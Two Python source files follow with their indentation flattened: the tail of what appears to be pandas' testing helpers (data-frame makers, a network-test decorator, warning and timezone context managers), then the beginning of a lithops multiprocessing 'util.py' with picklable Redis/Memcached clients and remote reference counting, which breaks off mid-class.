"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
The resulting DataFrame has the following columns:
* name : object dtype with string names
* id : int dtype with Poisson-distributed integer ids
* x, y : float dtype values drawn uniformly from [-1, 1)
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multiindex with given dimensions, levels, names, etc.
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. If True, will use default
names; if False, will use no names; if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
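# Illustrative usage sketch (not part of the original module):
# >>> makeCustomIndex(4, nlevels=1)                    # Index(['#_l0_g0', '#_l0_g1', ...])
# >>> makeCustomIndex(4, nlevels=2, names=["a", "b"])  # 2-level MultiIndex named 'a'/'b'
# >>> makeCustomIndex(5, nlevels=1, idx_type="i")      # integer Index of length 5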
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, r_idx_names - False/True/list of strings, yields no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
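# Illustrative usage sketch (not part of the original module): the decorated decorator can be
# applied bare or with keyword arguments.
# >>> @optional_args
# ... def tag(f, label="default"):
# ...     f.label = label
# ...     return f
# >>> @tag
# ... def a(): pass
# >>> @tag(label="custom")
# ... def b(): pass
# >>> a.label, b.label
# ('default', 'custom')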
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
.. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
Context manager to set the numpy random number generator seed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
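# Illustrative usage sketch (not part of the original module): the temporary dialect can be
# referenced by name inside the block, e.g. from pandas.read_csv.
# >>> import io
# >>> import pandas as pd
# >>> with with_csv_dialect("semi", delimiter=";"):
# ...     df = pd.read_csv(io.StringIO("a;b\n1;2\n"), dialect="semi")
# >>> list(df.columns)
# ['a', 'b']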
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
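# Illustrative usage sketch (not part of the original module; `df_large` is a hypothetical
# DataFrame): arithmetic inside the block is evaluated without numexpr.
# >>> with use_numexpr(False):
# ...     result = df_large + df_large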
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
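# Illustrative usage sketch (not part of the original module): the body runs once per thread,
# and the decorated call returns None.
# >>> results = []
# >>> @test_parallel(num_threads=2)
# ... def append_one():
# ...     results.append(1)
# >>> append_one()
# >>> len(results)
# 2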
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
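# Illustrative usage sketch (not part of the original module):
# >>> import numpy as np
# >>> import pandas as pd
# >>> wrapper = _make_skipna_wrapper(np.sum)
# >>> wrapper(pd.Series([1.0, np.nan, 2.0]))
# 3.0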
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
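# Illustrative usage sketch (not part of the original module); the separator depends on the OS,
# so on Linux/macOS:
# >>> convert_rows_list_to_csv_str(["a,b", "1,2"])
# 'a,b\n1,2\n'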
def external_error_raised(expected_exception: Type[Exception],) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of (func_name, expected) pairs
The first item of each pair is the name of an NDFrame method ('sum', 'prod', etc.).
The second item is the expected return value.
Returns
-------
list
List of (ndframe, function, expected result) tuples
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
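# Illustrative usage sketch (not part of the original module): each (name, expected) pair is
# expanded with the matching callables from SelectionMixin._cython_table.
# >>> import pandas as pd
# >>> params = get_cython_table_params(pd.Series([1, 2, 3]), [("sum", 6)])
# >>> all(expected == 6 for _, _, expected in params)
# True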
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
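# Illustrative usage sketch (not part of the original module):
# >>> get_op_from_name("add")(2, 3)
# 5
# >>> get_op_from_name("rsub")(2, 3)  # reverse subtraction: 3 - 2
# 1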
|
util.py
|
#
# Module providing various facilities to other parts of the package
#
# multiprocessing/util.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
# Modifications Copyright (c) 2020 Cloudlab URV
#
import os
import json
import traceback
import socket
import weakref
import redis
import pymemcache
import pika
import cloudpickle
import uuid
import logging
import lithops
import sys
import threading
import io
import itertools
from lithops.config import load_config
from . import config as mp_config
logger = logging.getLogger(__name__)
#
# Picklable redis client
#
class PicklableRedis(redis.StrictRedis):
def __init__(self, *args, **kwargs):
self._args = args
self._kwargs = kwargs
logger.debug('Creating picklable Redis client')
self._type = 'redis'
super().__init__(*self._args, **self._kwargs)
def __getstate__(self):
return self._args, self._kwargs
def __setstate__(self, state):
self.__init__(*state[0], **state[1])
def get_type(self):
return self._type
class PicklableMemcached(pymemcache.Client):
def __init__(self, *args, **kwargs):
self._args = args
self._kwargs = kwargs
self._type = 'memcached'
super().__init__(*self._args, **self._kwargs)
def __getstate__(self):
return self._args, self._kwargs
def __setstate__(self, state):
self.__init__(*state[0], **state[1])
def get_type(self):
return self._type
#def get_redis_client(**overwrites):
def get_cache_client(**overwrites):
try:
if 'redis' in mp_config.get_parameter(mp_config.CACHE) :
conn_params = load_config()['redis']
elif 'memcached' in mp_config.get_parameter(mp_config.CACHE):
conn_params = load_config()['memcached']
except KeyError:
raise Exception('Cache section (redis/memcached) not found in your config')
conn_params.update(overwrites)
if 'redis' in mp_config.get_parameter(mp_config.CACHE) :
return PicklableRedis(**conn_params)
if 'memcached' in mp_config.get_parameter(mp_config.CACHE) :
return PicklableMemcached((conn_params['host'],conn_params['port']))
def get_amqp_client(**overwrites):
try:
if 'rabbitmq' in mp_config.get_parameter(mp_config.AMQP) :
conn_params = load_config()['rabbitmq']
except KeyError:
raise Exception('AMQP section (rabbitmq) not found in your config')
conn_params.update(overwrites)
if 'rabbitmq' in mp_config.get_parameter(mp_config.AMQP) :
return pika.URLParameters(conn_params['amqp_url'])
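# Illustrative sketch (not part of the original module) of the config sections these helpers
# read, inferred from the keys used above; the hosts, ports and URL below are assumptions:
# redis:
#   host: 127.0.0.1
#   port: 6379
# memcached:
#   host: 127.0.0.1
#   port: 11211
# rabbitmq:
#   amqp_url: amqp://guest:guest@127.0.0.1:5672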
#
# Helper functions
#
def get_uuid(length=12):
return uuid.uuid1().hex[:length]
def make_stateless_script(script):
# Make stateless redis Lua script (redis.client.Script)
# Just to ensure no redis client is cached and avoid
# creating another connection when unpickling this object.
script.registered_client = None
return script
def export_execution_details(futures, lithops_executor):
if mp_config.get_parameter(mp_config.EXPORT_EXECUTION_DETAILS):
try:
path = os.path.realpath(mp_config.get_parameter(mp_config.EXPORT_EXECUTION_DETAILS))
job_id = futures[0].job_id
plots_file_name = '{}_{}'.format(lithops_executor.executor_id, job_id)
lithops_executor.plot(fs=futures, dst=os.path.join(path, plots_file_name))
stats = {fut.call_id: fut.stats for fut in futures}
stats_file_name = '{}_{}_stats.json'.format(lithops_executor.executor_id, job_id)
with open(os.path.join(path, stats_file_name), 'w') as stats_file:
stats_json = json.dumps(stats, indent=4)
stats_file.write(stats_json)
except Exception as e:
logger.error('Error while exporting execution results: {}\n{}'.format(e, traceback.format_exc()))
def get_network_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.connect(('<broadcast>', 0))
return s.getsockname()[0]
#
# Remote logging
#
def setup_log_streaming(executor):
if mp_config.get_parameter(mp_config.STREAM_STDOUT):
stream = executor.executor_id
logger.debug('Log streaming enabled, stream name: {}'.format(stream))
remote_logger = RemoteLoggingFeed(stream)
remote_logger.start()
return remote_logger, stream
else:
return None, None
if 'redis' in mp_config.get_parameter(mp_config.CACHE):
#
# object for counting remote references (redis keys)
# and garbage collect them automatically when nothing
# is pointing at them
#
class RemoteReference:
def __init__(self, referenced, managed=False, client=None):
if isinstance(referenced, str):
referenced = [referenced]
if not isinstance(referenced, list):
raise TypeError("referenced must be a key (str) or"
"a list of keys")
self._referenced = referenced
# reference counter key
self._rck = '{}-{}'.format('ref', self._referenced[0])
self._referenced.append(self._rck)
self._client = client or get_cache_client()
self._callback = None
self.managed = managed
@property
def managed(self):
return self._callback is None
@managed.setter
def managed(self, value):
managed = value
if self._callback is not None:
self._callback.atexit = False
self._callback.detach()
if managed:
self._callback = None
else:
self._callback = weakref.finalize(self, type(self)._finalize,
self._client, self._rck, self._referenced)
def __getstate__(self):
return (self._rck, self._referenced,
self._client, self.managed)
def __setstate__(self, state):
(self._rck, self._referenced,
self._client) = state[:-1]
self._callback = None
self.managed = state[-1]
self.incref()
def incref(self):
if not self.managed:
pipeline = self._client.pipeline()
pipeline.incr(self._rck, 1)
pipeline.expire(self._rck, mp_config.get_parameter(mp_config.CACHE_EXPIRY_TIME))
counter, _ = pipeline.execute()
return int(counter)
def decref(self):
if not self.managed:
pipeline = self._client.pipeline()
pipeline.decr(self._rck, 1)
pipeline.expire(self._rck, mp_config.get_parameter(mp_config.CACHE_EXPIRY_TIME))
counter, _ = pipeline.execute()
return int(counter)
def refcount(self):
count = self._client.get(self._rck)
return 1 if count is None else int(count) + 1
def collect(self):
if len(self._referenced) > 0:
self._client.delete(*self._referenced)
self._referenced = []
@staticmethod
def _finalize(client, rck, referenced):
count = int(client.decr(rck, 1))
if count < 0 and len(referenced) > 0:
client.delete(*referenced)
elif 'memcached' in mp_config.get_parameter(mp_config.CACHE):
#
# object for counting remote references (redis keys)
# and garbage collect them automatically when nothing
# is pointing at them
#
class RemoteReference:
